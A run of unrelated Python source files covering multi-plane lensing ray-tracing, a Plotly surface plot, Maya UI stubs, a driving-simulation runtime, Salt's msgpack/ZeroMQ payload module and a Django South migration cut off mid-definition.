self._z_source_convention = z_source_convention
if len(lens_redshift_list) > 0:
z_lens_max = np.max(lens_redshift_list)
if z_lens_max >= z_source_convention:
raise ValueError('deflector redshifts higher or equal the source redshift convention (%s >= %s for the reduced lens'
' model quantities not allowed (leads to negative reduced deflection angles!'
% (z_lens_max, z_source_convention))
if not len(lens_model_list) == len(lens_redshift_list):
raise ValueError("The length of lens_model_list does not correspond to redshift_list")
self._lens_redshift_list = lens_redshift_list
super(MultiPlaneBase, self).__init__(lens_model_list, numerical_alpha_class=numerical_alpha_class,
lens_redshift_list=lens_redshift_list,
z_source_convention=z_source_convention)
if len(lens_model_list) < 1:
self._sorted_redshift_index = []
else:
self._sorted_redshift_index = self._index_ordering(lens_redshift_list)
z_before = 0
T_z = 0
self._T_ij_list = []
self._T_z_list = []
# Sort redshift for vectorized reduced2physical factor calculation
if len(lens_model_list)<1:
self._reduced2physical_factor = []
else:
z_sort = np.array(self._lens_redshift_list)[self._sorted_redshift_index]
z_source_array = np.ones(z_sort.shape)*z_source_convention
self._reduced2physical_factor = self._cosmo_bkg.d_xy(0, z_source_convention) / self._cosmo_bkg.d_xy(z_sort, z_source_array)
for idex in self._sorted_redshift_index:
z_lens = self._lens_redshift_list[idex]
if z_before == z_lens:
delta_T = 0
else:
T_z = self._cosmo_bkg.T_xy(0, z_lens)
delta_T = self._cosmo_bkg.T_xy(z_before, z_lens)
self._T_ij_list.append(delta_T)
self._T_z_list.append(T_z)
z_before = z_lens
def ray_shooting_partial(self, x, y, alpha_x, alpha_y, z_start, z_stop, kwargs_lens,
include_z_start=False, T_ij_start=None, T_ij_end=None):
"""
ray-tracing through parts of the coin, starting with (x,y) co-moving distances and angles (alpha_x, alpha_y)
at redshift z_start and then backwards to redshift z_stop
:param x: co-moving position [Mpc]
:param y: co-moving position [Mpc]
:param alpha_x: ray angle at z_start [arcsec]
:param alpha_y: ray angle at z_start [arcsec]
:param z_start: redshift of start of computation
:param z_stop: redshift where output is computed
:param kwargs_lens: lens model keyword argument list
:param include_z_start: bool, if True, includes the computation of the deflection angle at the same redshift as
the start of the ray-tracing. ATTENTION: deflection angles at the same redshift as z_stop will be computed always!
This can lead to duplications in the computation of deflection angles.
:param T_ij_start: transverse angular distance between the starting redshift to the first lens plane to follow.
If not set, will compute the distance each time this function gets executed.
:param T_ij_end: transverse angular distance between the last lens plane being computed and z_end.
If not set, will compute the distance each time this function gets executed.
:return: co-moving position and angles at redshift z_stop
"""
x = np.array(x, dtype=float)
y = np.array(y, dtype=float)
alpha_x = np.array(alpha_x)
alpha_y = np.array(alpha_y)
z_lens_last = z_start
first_deflector = True
for i, idex in enumerate(self._sorted_redshift_index):
z_lens = self._lens_redshift_list[idex]
if self._start_condition(include_z_start, z_lens, z_start) and z_lens <= z_stop:
if first_deflector is True:
if T_ij_start is None:
if z_start == 0:
delta_T = self._T_ij_list[0]
else:
delta_T = self._cosmo_bkg.T_xy(z_start, z_lens)
else:
delta_T = T_ij_start
first_deflector = False
else:
delta_T = self._T_ij_list[i]
x, y = self._ray_step_add(x, y, alpha_x, alpha_y, delta_T)
alpha_x, alpha_y = self._add_deflection(x, y, alpha_x, alpha_y, kwargs_lens, i)
z_lens_last = z_lens
if T_ij_end is None:
if z_lens_last == z_stop:
delta_T = 0
else:
delta_T = self._cosmo_bkg.T_xy(z_lens_last, z_stop)
else:
delta_T = T_ij_end
x, y = self._ray_step_add(x, y, alpha_x, alpha_y, delta_T)
return x, y, alpha_x, alpha_y
def transverse_distance_start_stop(self, z_start, z_stop, include_z_start=False):
"""
computes the transverse distance (T_ij) that is required by the ray-tracing between the starting redshift and
the first deflector afterwards and the last deflector before the end of the ray-tracing.
:param z_start: redshift of the start of the ray-tracing
:param z_stop: stop of ray-tracing
:param include_z_start: boolean, if True includes the computation of the starting position if the first
deflector is at z_start
:return: T_ij_start, T_ij_end
"""
z_lens_last = z_start
first_deflector = True
T_ij_start = None
for i, idex in enumerate(self._sorted_redshift_index):
z_lens = self._lens_redshift_list[idex]
if self._start_condition(include_z_start, z_lens, z_start) and z_lens <= z_stop:
if first_deflector is True:
T_ij_start = self._cosmo_bkg.T_xy(z_start, z_lens)
first_deflector = False
z_lens_last = z_lens
T_ij_end = self._cosmo_bkg.T_xy(z_lens_last, z_stop)
return T_ij_start, T_ij_end
def geo_shapiro_delay(self, theta_x, theta_y, kwargs_lens, z_stop, T_z_stop=None, T_ij_end=None):
"""
geometric and Shapiro (gravitational) light travel time relative to a straight path through the coordinate (0,0)
Negative sign means earlier arrival time
:param theta_x: angle in x-direction on the image
:param theta_y: angle in y-direction on the image
:param kwargs_lens: lens model keyword argument list
:param z_stop: redshift of the source to stop the backwards ray-tracing
:param T_z_stop: optional, transversal angular distance from z=0 to z_stop
:param T_ij_end: optional, transversal angular distance between the last lensing plane and the source plane
:return: dt_geo, dt_shapiro, [days]
"""
dt_grav = np.zeros_like(theta_x, dtype=float)
dt_geo = np.zeros_like(theta_x, dtype=float)
x = np.zeros_like(theta_x, dtype=float)
y = np.zeros_like(theta_y, dtype=float)
alpha_x = np.array(theta_x, dtype=float)
alpha_y = np.array(theta_y, dtype=float)
i = 0
z_lens_last = 0
for i, index in enumerate(self._sorted_redshift_index):
z_lens = self._lens_redshift_list[index]
if z_lens <= z_stop:
T_ij = self._T_ij_list[i]
x_new, y_new = self._ray_step(x, y, alpha_x, alpha_y, T_ij)
if i == 0:
pass
elif T_ij > 0:
T_j = self._T_z_list[i]
T_i = self._T_z_list[i - 1]
beta_i_x, beta_i_y = x / T_i, y / T_i
beta_j_x, beta_j_y = x_new / T_j, y_new / T_j
dt_geo_new = self._geometrical_delay(beta_i_x, beta_i_y, beta_j_x, beta_j_y, T_i, T_j, T_ij)
dt_geo += dt_geo_new
x, y = x_new, y_new
dt_grav_new = self._gravitational_delay(x, y, kwargs_lens, i, z_lens)
alpha_x, alpha_y = self._add_deflection(x, y, alpha_x, alpha_y, kwargs_lens, i)
dt_grav += dt_grav_new
z_lens_last = z_lens
if T_ij_end is None:
T_ij_end = self._cosmo_bkg.T_xy(z_lens_last, z_stop)
T_ij = T_ij_end
x_new, y_new = self._ray_step(x, y, alpha_x, alpha_y, T_ij)
if T_z_stop is None:
T_z_stop = self._cosmo_bkg.T_xy(0, z_stop)
T_j = T_z_stop
T_i = self._T_z_list[i]
beta_i_x, beta_i_y = x / T_i, y / T_i
beta_j_x, beta_j_y = x_new / T_j, y_new / T_j
dt_geo_new = self._geometrical_delay(beta_i_x, beta_i_y, beta_j_x, beta_j_y, T_i, T_j, T_ij)
dt_geo += dt_geo_new
return dt_geo, dt_grav
@staticmethod
def _index_ordering(redshift_list):
"""
:param redshift_list: list of redshifts
:return: indexes in ascending order to be evaluated (from z=0 to z=z_source)
"""
redshift_list = np.array(redshift_list)
#sort_index = np.argsort(redshift_list[redshift_list < z_source])
sort_index = np.argsort(redshift_list)
#if len(sort_index) < 1:
# Warning("There is no lens object between observer at z=0 and source at z=%s" % z_source)
return sort_index
def _reduced2physical_deflection(self, alpha_reduced, index_lens):
"""
alpha_reduced = D_ds/Ds alpha_physical
:param alpha_reduced: reduced deflection angle
:param index_lens: integer, index of the deflector plane
:return: physical deflection angle
"""
factor = self._reduced2physical_factor[index_lens]
return alpha_reduced * factor
def _gravitational_delay(self, x, y, kwargs_lens, index, z_lens):
"""
:param x: co-moving coordinate at the lens plane
:param y: co-moving coordinate at the lens plane
:param kwargs_lens: lens model keyword arguments
:param z_lens: redshift of the deflector
:param index: index of the lens model in sorted redshfit convention
:return: gravitational delay in units of days as seen at z=0
"""
theta_x, theta_y = self._co_moving2angle(x, y, index)
k = self._sorted_redshift_index[index]
potential = self.func_list[k].function(theta_x, theta_y, **kwargs_lens[k])
delay_days = self._lensing_potential2time_delay(potential, z_lens, z_source=self._z_source_convention)
return -delay_days
@staticmethod
def _geometrical_delay(beta_i_x, beta_i_y, beta_j_x, beta_j_y, T_i, T_j, T_ij):
"""
:param beta_i_x: angle on the sky at plane i
:param beta_i_y: angle on the sky at plane i
:param beta_j_x: angle on the sky at plane j
:param beta_j_y: angle on the sky at plane j
:param T_i: transverse diameter distance to z_i
:param T_j: transverse diameter distance to z_j
:param T_ij: transverse diameter distance from z_i to z_j
:return: excess delay relative to a straight line
"""
d_beta_x = beta_j_x - beta_i_x
d_beta_y = beta_j_y - beta_i_y
tau_ij = T_i * T_j / T_ij * const.Mpc / const.c / const.day_s * const.arcsec**2
return tau_ij * (d_beta_x ** 2 + d_beta_y ** 2) / 2
def _lensing_potential2time_delay(self, potential, z_lens, z_source):
"""
transforms the lensing potential (in units arcsec^2) to a gravitational time-delay as measured at z=0
:param potential: lensing potential
:param z_lens: redshift of the deflector
:param z_source: redshift of source for the definition of the lensing quantities
:return: gravitational time-delay in units of days
"""
D_dt = self._cosmo_bkg.ddt(z_lens, z_source)
delay_days = const.delay_arcsec2days(potential, D_dt)
return delay_days
def _co_moving2angle(self, x, y, index):
"""
transforms co-moving distances Mpc into angles on the sky (radian)
:param x: co-moving distance
:param y: co-moving distance
:param index: index of plane
:return: angles on the sky
"""
T_z = self._T_z_list[index]
theta_x = x / T_z
theta_y = y / T_z
return theta_x, theta_y
@staticmethod
def _ray_step(x, y, alpha_x, alpha_y, delta_T):
"""
ray propagation with small angle approximation
:param x: co-moving x-position
:param y: co-moving y-position
:param alpha_x: deflection angle in x-direction at (x, y)
:param alpha_y: deflection angle in y-direction at (x, y)
:param delta_T: transverse angular diameter distance to the next step
:return: co-moving position at the next step (backwards)
"""
x_ = x + alpha_x * delta_T
y_ = y + alpha_y * delta_T
return x_, y_
@staticmethod
def _ray_step_add(x, y, alpha_x, alpha_y, delta_T):
"""
ray propagation with small angle approximation
:param x: co-moving x-position
:param y: co-moving y-position
:param alpha_x: deflection angle in x-direction at (x, y)
:param alpha_y: deflection angle in y-direction at (x, y)
:param delta_T: transverse angular diameter distance to the next step
:return: co-moving position at the next step (backwards)
"""
x += alpha_x * delta_T
y += alpha_y * delta_T
return x, y
def _add_deflection(self, x, y, alpha_x, alpha_y, kwargs_lens, index):
"""
adds the physical deflection angle of a single lens plane to the deflection field
:param x: co-moving distance at the deflector plane
:param y: co-moving distance at the deflector plane
:param alpha_x: physical angle (radian) before the deflector plane
:param alpha_y: physical angle (radian) before the deflector plane
:param kwargs_lens: lens model parameter kwargs
:param index: index of the lens model to be added in sorted redshift list convention
:param idex_lens: redshift of the deflector plane
:return: updated physical deflection after deflector plane (in a backwards ray-tracing perspective)
"""
theta_x, theta_y = self._co_moving2angle(x, y, index)
k = self._sorted_redshift_index[index]
alpha_x_red, alpha_y_red = self.func_list[k].derivatives(theta_x, theta_y, **kwargs_lens[k])
alpha_x_phys = self._reduced2physical_deflection(alpha_x_red, index)
alpha_y_phys = self._reduced2physical_deflection(alpha_y_red, index)
return alpha_x - alpha_x_phys, alpha_y - alpha_y_phys
@staticmethod
def _start_condition(inclusive, z_lens, z_start):
"""
:param inclusive: boolean, if True selects z_lens including z_start, else only selects z_lens > z_start
:param z_lens: deflector redshift
:param z_start: starting redshift (lowest redshift)
:return: boolean of condition
"""
if inclusive:
return z_lens >= z_start
else:
return z_lens > z_start
|
# The Plotly^^^plotly^^^ package
import plotly
# Importing ^^^numpy^^^
import numpy
def sigmoid(x):
return (1 + numpy.exp(-x)) ** -1
samplesPerDimension = 500
# Using numpy.linspace to create x and y values is from somewhere on ^^^plotly^^^'s website, most
# likely. It is a convenient way to do this, so that's why.
evaluationRange = numpy.linspace([-5, -5], [5, 5], samplesPerDimension, axis=1)
# Using the technique that I used from networkcomponents.py (PairwiseDifference) where one dimension
# is on the first axis and the other is on the second axis so that they can broadcast to create all
# permutations between the array of x values and the array of y values. Before broadcasting, we need
# to add a dimension to both the x vector and y vector, but at the beginning and end of them,
# respectively, which is also what happens in PairwiseDifference. However, this code doesn't
# actually broadcast, but it mimics broadcasting with the .repeat(...) calls.
####################################################################################################
# #
x = numpy.expand_dims(evaluationRange[0], 0).repeat(samplesPerDimension, 0)
y = numpy.expand_dims(evaluationRange[1], 1).repeat(samplesPerDimension, 1)
evaluationPairs = numpy.stack([x, y], 2)
# #
####################################################################################################
weights = numpy.array([1, 1])
constant = 1.0
# Calculating every combination for the three functions
dotProduct = numpy.dot(evaluationPairs, weights)
cosine = dotProduct \
/ \
( numpy.linalg.norm(weights) * numpy.linalg.norm(evaluationPairs, axis=2) )
softenedCosine = dotProduct \
/ \
( numpy.linalg.norm(weights) * numpy.linalg.norm(evaluationPairs, axis=2) + constant)
dotProductSurface = plotly.graph_objects.Surface(
x=evaluationRange[0],
y=evaluationRange[1], z=sigmoid(dotProduct)
)
cosineSurface = plotly.graph_objects.Surface(
x=evaluationRange[0],
y=evaluationRange[1], z=cosine
)
softenedCosineSurface = plotly.graph_objects.Surface(
x=evaluationRange[0],
y=evaluationRange[1], z=softenedCosine
)
figure = plotly.graph_objects.Figure(
softenedCosineSurface,
layout={ "scene": { "aspectmode": "data" } }
)
# "validate" left as True partially because I trust the default value listed in
# ^^^plotlyfigureshow^^^
figure.show(renderer="firefox")
#figure.write_image("graph.png", "png", 1200, 900, 1.0, True, "kaleido")
|
import maya.mel as mel
import maya
import maya.cmds as cmds
import sys
class TselectionWin(object):
"""
Base class for a dialog which works on the user's selection
"""
def __del__(self):
pass
def __init__(self, title, selectionFilter='<function <lambda>>', objects=[]):
"""
selectionFilter - function which returns True if object is selectable
"""
pass
def activate(self, window):
"""
Call this method once the window is created
"""
pass
def close(self):
pass
def getWindowTitle(self):
pass
def onSelectionChanged(self, *args):
"""
Called anytime the selection list changes,
self.objects is updated and window title is updated.
"""
pass
__dict__ = None
__weakref__ = None
class TadjustBackgroundImageWin(TselectionWin):
"""
Adjust the background image for a container Dialog
"""
def __init__(self, editor):
pass
def hyperGraphCmd(self, *args, **kwargs):
pass
def loadImage(self, theFile):
pass
def onAdjustImagePositionHorizontal(self, val):
pass
def onAdjustImagePositionVertical(self, val):
pass
def onAdjustImageScale(self, val):
pass
def onFitToHeight(self, arg):
pass
def onFitToWidth(self, arg):
pass
def onImageFieldChange(self, val):
pass
def onLoadImage(self):
pass
def onSelectionChanged(self, *args):
"""
override selection callback
"""
pass
def show(self):
"""
Build and show the dialog
"""
pass
def update(self):
"""
update the ui after something has changed
"""
pass
def adjustBackgroundImageWin(editor):
"""
Main entry point. Create and show the adjust-background-image dialog.
"""
pass
|
# Copyright (c) 2020 Julian Bernhard, Klemens Esterle, Patrick Hart and
# Tobias Kessler
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
from bark.world.opendrive import *
from bark.world import *
from bark.geometry import *
from bark.runtime import PyRuntime
class Runtime(PyRuntime):
def __init__(self,
step_time,
viewer,
scenario_generator=None,
render=False):
self._step_time = step_time
self._viewer = viewer
self._scenario_generator = scenario_generator
self._scenario_idx = None
self._scenario = None
self._render = render
self._reset_has_been_called = False
def reset(self, scenario=None):
if scenario:
self._scenario = scenario
else:
self._scenario, self._scenario_idx = \
self._scenario_generator.get_next_scenario()
self._world = self._scenario.GetWorldState()
self._reset_has_been_called = True
self._viewer.Reset()
def step(self):
assert(self._reset_has_been_called==True)
self._world.Step(self._step_time)
if self._render:
self.render()
def render(self):
# self._viewer.clear()
self._viewer.drawWorld(
self._world,
self._scenario._eval_agent_ids,
scenario_idx=self._scenario_idx)
self._viewer.clear()
def run(self, steps):
for step_count in range(steps):
self.Step()
|
# -*- coding: utf-8 -*-
"""
Many aspects of the salt payload need to be managed, from the return of
encrypted keys to general payload dynamics and packaging, these happen
in here
"""
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import datetime
import gc
# import sys # Use if sys is commented out below
import logging
# Import salt libs
import salt.log
import salt.transport.frame
import salt.utils.immutabletypes as immutabletypes
import salt.utils.msgpack
import salt.utils.stringutils
from salt.exceptions import SaltDeserializationError, SaltReqTimeoutError
# Import third party libs
from salt.ext import six
from salt.utils.data import CaseInsensitiveDict
try:
import zmq
except ImportError:
# No need for zeromq in local mode
pass
log = logging.getLogger(__name__)
def package(payload):
"""
This method for now just wraps msgpack.dumps, but it is here so that
we can make the serialization a custom option in the future with ease.
"""
return salt.utils.msgpack.dumps(payload)
def unpackage(package_):
"""
Unpackages a payload
"""
return salt.utils.msgpack.loads(package_, use_list=True)
def format_payload(enc, **kwargs):
"""
Pass in the required arguments for a payload, the enc type and the cmd,
then a list of keyword args to generate the body of the load dict.
"""
payload = {"enc": enc}
load = {}
for key in kwargs:
load[key] = kwargs[key]
payload["load"] = load
return package(payload)
class Serial(object):
"""
Create a serialization object, this object manages all message
serialization in Salt
"""
def __init__(self, opts):
if isinstance(opts, dict):
self.serial = opts.get("serial", "msgpack")
elif isinstance(opts, six.string_types):
self.serial = opts
else:
self.serial = "msgpack"
def loads(self, msg, encoding=None, raw=False):
"""
Run the correct loads serialization format
:param encoding: Useful for Python 3 support. If the msgpack data
was encoded using "use_bin_type=True", this will
differentiate between the 'bytes' type and the
'str' type by decoding contents with 'str' type
to what the encoding was set as. Recommended
encoding is 'utf-8' when using Python 3.
If the msgpack data was not encoded using
"use_bin_type=True", it will try to decode
all 'bytes' and 'str' data (the distinction has
been lost in this case) to what the encoding is
set as. In this case, it will fail if any of
the contents cannot be converted.
"""
try:
def ext_type_decoder(code, data):
if code == 78:
data = salt.utils.stringutils.to_unicode(data)
return datetime.datetime.strptime(data, "%Y%m%dT%H:%M:%S.%f")
return data
gc.disable() # performance optimization for msgpack
loads_kwargs = {"use_list": True, "ext_hook": ext_type_decoder}
if salt.utils.msgpack.version >= (0, 4, 0):
# msgpack only supports 'encoding' starting in 0.4.0.
# Due to this, if we don't need it, don't pass it at all so
# that under Python 2 we can still work with older versions
# of msgpack.
if salt.utils.msgpack.version >= (0, 5, 2):
if encoding is None:
loads_kwargs["raw"] = True
else:
loads_kwargs["raw"] = False
else:
loads_kwargs["encoding"] = encoding
try:
ret = salt.utils.msgpack.unpackb(msg, **loads_kwargs)
except UnicodeDecodeError:
# msg contains binary data
loads_kwargs.pop("raw", None)
loads_kwargs.pop("encoding", None)
ret = salt.utils.msgpack.loads(msg, **loads_kwargs)
else:
ret = salt.utils.msgpack.loads(msg, **loads_kwargs)
if six.PY3 and encoding is None and not raw:
ret = salt.transport.frame.decode_embedded_strs(ret)
except Exception as exc: # pylint: disable=broad-except
log.critical(
"Could not deserialize msgpack message. This often happens "
"when trying to read a file not in binary mode. "
"To see message payload, enable debug logging and retry. "
"Exception: %s",
exc,
)
log.debug("Msgpack deserialization failure on message: %s", msg)
gc.collect()
raise six.raise_from(
SaltDeserializationError(
"Could not deserialize msgpack message." " See log for more info."
),
exc,
)
finally:
gc.enable()
return ret
def load(self, fn_):
"""
Run the correct serialization to load a file
"""
data = fn_.read()
fn_.close()
if data:
if six.PY3:
return self.loads(data, encoding="utf-8")
else:
return self.loads(data)
def dumps(self, msg, use_bin_type=False):
"""
Run the correct dumps serialization format
:param use_bin_type: Useful for Python 3 support. Tells msgpack to
differentiate between 'str' and 'bytes' types
by encoding them differently.
Since this changes the wire protocol, this
option should not be used outside of IPC.
"""
def ext_type_encoder(obj):
if isinstance(obj, six.integer_types):
# msgpack can't handle the very long Python longs for jids
# Convert any very long longs to strings
return six.text_type(obj)
elif isinstance(obj, (datetime.datetime, datetime.date)):
# msgpack doesn't support datetime.datetime and datetime.date datatypes.
# So here we have converted these types to custom datatype
# This is msgpack Extended types numbered 78
return salt.utils.msgpack.ExtType(
78,
salt.utils.stringutils.to_bytes(obj.strftime("%Y%m%dT%H:%M:%S.%f")),
)
# The same for immutable types
elif isinstance(obj, immutabletypes.ImmutableDict):
return dict(obj)
elif isinstance(obj, immutabletypes.ImmutableList):
return list(obj)
elif isinstance(obj, (set, immutabletypes.ImmutableSet)):
# msgpack can't handle set so translate it to tuple
return tuple(obj)
elif isinstance(obj, CaseInsensitiveDict):
return dict(obj)
# Nothing known exceptions found. Let msgpack raise its own.
return obj
try:
return salt.utils.msgpack.packb(
msg, default=ext_type_encoder, use_bin_type=use_bin_type
)
except (OverflowError, salt.utils.msgpack.exceptions.PackValueError):
# msgpack<=0.4.6 don't call ext encoder on very long integers raising the error instead.
# Convert any very long longs to strings and call dumps again.
def verylong_encoder(obj, context):
# Make sure we catch recursion here.
objid = id(obj)
# This instance list needs to correspond to the types recursed
# in the below if/elif chain. Also update
# tests/unit/test_payload.py
if objid in context and isinstance(obj, (dict, list, tuple)):
return "<Recursion on {} with id={}>".format(
type(obj).__name__, id(obj)
)
context.add(objid)
# The isinstance checks in this if/elif chain need to be
# kept in sync with the above recursion check.
if isinstance(obj, dict):
for key, value in six.iteritems(obj.copy()):
obj[key] = verylong_encoder(value, context)
return dict(obj)
elif isinstance(obj, (list, tuple)):
obj = list(obj)
for idx, entry in enumerate(obj):
obj[idx] = verylong_encoder(entry, context)
return obj
# A value of an Integer object is limited from -(2^63) upto (2^64)-1 by MessagePack
# spec. Here we care only of JIDs that are positive integers.
if isinstance(obj, six.integer_types) and obj >= pow(2, 64):
return six.text_type(obj)
else:
return obj
msg = verylong_encoder(msg, set())
return salt.utils.msgpack.packb(
msg, default=ext_type_encoder, use_bin_type=use_bin_type
)
def dump(self, msg, fn_):
"""
Serialize the correct data into the named file object
"""
if six.PY2:
fn_.write(self.dumps(msg))
else:
# When using Python 3, write files in such a way
# that the 'bytes' and 'str' types are distinguishable
# by using "use_bin_type=True".
fn_.write(self.dumps(msg, use_bin_type=True))
fn_.close()
class SREQ(object):
"""
Create a generic interface to wrap salt zeromq req calls.
"""
def __init__(self, master, id_="", serial="msgpack", linger=0, opts=None):
self.master = master
self.id_ = id_
self.serial = Serial(serial)
self.linger = linger
self.context = zmq.Context()
self.poller = zmq.Poller()
self.opts = opts
@property
def socket(self):
"""
Lazily create the socket.
"""
if not hasattr(self, "_socket"):
# create a new one
self._socket = self.context.socket(zmq.REQ)
if hasattr(zmq, "RECONNECT_IVL_MAX"):
self._socket.setsockopt(zmq.RECONNECT_IVL_MAX, 5000)
self._set_tcp_keepalive()
if self.master.startswith("tcp://["):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, "IPV6"):
self._socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, "IPV4ONLY"):
self._socket.setsockopt(zmq.IPV4ONLY, 0)
self._socket.linger = self.linger
if self.id_:
self._socket.setsockopt(zmq.IDENTITY, self.id_)
self._socket.connect(self.master)
return self._socket
def _set_tcp_keepalive(self):
if hasattr(zmq, "TCP_KEEPALIVE") and self.opts:
if "tcp_keepalive" in self.opts:
self._socket.setsockopt(zmq.TCP_KEEPALIVE, self.opts["tcp_keepalive"])
if "tcp_keepalive_idle" in self.opts:
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts["tcp_keepalive_idle"]
)
if "tcp_keepalive_cnt" in self.opts:
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts["tcp_keepalive_cnt"]
)
if "tcp_keepalive_intvl" in self.opts:
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts["tcp_keepalive_intvl"]
)
def clear_socket(self):
"""
delete socket if you have it
"""
if hasattr(self, "_socket"):
if isinstance(self.poller.sockets, dict):
sockets = list(self.poller.sockets.keys())
for socket in sockets:
log.trace("Unregistering socket: %s", socket)
self.poller.unregister(socket)
else:
for socket in self.poller.sockets:
log.trace("Unregistering socket: %s", socket)
self.poller.unregister(socket[0])
del self._socket
def send(self, enc, load, tries=1, timeout=60):
"""
Takes two arguments, the encryption type and the base payload
"""
payload = {"enc": enc}
payload["load"] = load
pkg = self.serial.dumps(payload)
self.socket.send(pkg)
self.poller.register(self.socket, zmq.POLLIN)
tried = 0
while True:
polled = self.poller.poll(timeout * 1000)
tried += 1
if polled:
break
if tries > 1:
log.info(
"SaltReqTimeoutError: after %s seconds. (Try %s of %s)",
timeout,
tried,
tries,
)
if tried >= tries:
self.clear_socket()
raise SaltReqTimeoutError(
"SaltReqTimeoutError: after {0} seconds, ran {1} "
"tries".format(timeout * tried, tried)
)
return self.serial.loads(self.socket.recv())
def send_auto(self, payload, tries=1, timeout=60):
"""
Detect the encryption type based on the payload
"""
enc = payload.get("enc", "clear")
load = payload.get("load", {})
return self.send(enc, load, tries, timeout)
def destroy(self):
if isinstance(self.poller.sockets, dict):
sockets = list(self.poller.sockets.keys())
for socket in sockets:
if socket.closed is False:
socket.setsockopt(zmq.LINGER, 1)
socket.close()
self.poller.unregister(socket)
else:
for socket in self.poller.sockets:
if socket[0].closed is False:
socket[0].setsockopt(zmq.LINGER, 1)
socket[0].close()
self.poller.unregister(socket[0])
if self.socket.closed is False:
self.socket.setsockopt(zmq.LINGER, 1)
self.socket.close()
if self.context.closed is False:
self.context.term()
# pylint: disable=W1701
def __del__(self):
self.destroy()
# pylint: enable=W1701
|
# flake8: noqa
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Enquiry.is_published'
db.add_column('enquiry_enquiry', 'is_published',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Enquiry.is_published'
db.delete_column('enquiry_enquiry', 'is_published')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'enquiry.answer': {
'Meta': {'object_name': 'Answer'},
'enquiry': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'answers'", 'to': "orm['enquiry.Enquiry']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'enquiry.answertrans': {
'Meta': {'object_name': 'AnswerTrans'},
'answer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['enquiry.Answer']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'enquiry.enquiry': {
'Meta': {'object_name': 'Enquiry'},
'allow_anonymous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'enquiries'", 'null': 'True', 'to': "orm['auth.User']"}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 10, 23, 0, 0)', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'start_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 10, 16, 0, 0)'})
},
'enquiry.enquirytrans': {
'Meta': {'object_name': 'EnquiryTrans'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'enquiry': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['enquiry.Enquiry']"}),
'extra_info': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'question': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'enquiry.vote': {
'Meta': {'object_name': 'Vote'},
